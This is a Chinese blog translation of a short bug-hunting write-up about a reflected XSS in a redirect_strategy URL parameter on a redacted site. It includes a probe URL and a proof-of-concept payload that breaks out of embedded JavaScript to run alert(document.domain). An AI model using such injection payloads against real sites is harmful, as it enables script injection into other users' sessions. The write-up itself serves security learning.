第十二篇翻译:反射型XSS

原文:My First 0day Exploit (Reflected XSS)

漏洞:javascrip XSS

作者:Ali TÜTÜNCÜ

难度:低

步骤:

  1. 当我访问网址https://xxx.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=0 时,查看源码看到下面的JS代码

  2. 然后我开始测试URL参数是否可控,可以看到redirect_strategy参数中的值被嵌入了JS代码中,但是特殊符号被HTML编码了

1
https://xxx.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy="'<>/();

  3. 因为正常的XSS语句不能直接使用,所以我只能通过控制JS代码来嵌入XSS语句

1
https://xxx.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=); alert(document.domain); if(1

本文标题:第十二篇翻译:反射型XSS

文章作者:TimeS0ng

发布时间:2018-12-27, 16:55:58

最后更新:2018-12-27, 16:57:15

原始链接:http://TimeS0ng.github.io/2018/12/27/第十二篇翻译:反射型XSS/

许可协议: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

文章目录
  1. 1. 原文:My First 0day Exploit (Reflected XSS)
  2. 2. 漏洞:javascrip XSS
  3. 3. 作者:Ali TÜTÜNCÜ
  4. 4. 难度:低
  • 步骤:
    1. 1.   1. 当我访问网址https://xxx.com/amp-iframe-redirect?scheme_redirect=&redirect_strategy=0 时,查看源码看到下面的JS代码
    2. 2.   2. 然后我开始测试URL参数是否可控,可以看到redirect_strategy参数中的值被嵌入了JS代码中,但是特殊符号被HTML编码了
    3. 3.   3. 因为正常的XSS语句不能直接使用,所以我只能通过控制JS代码来嵌入XSS语句
    • |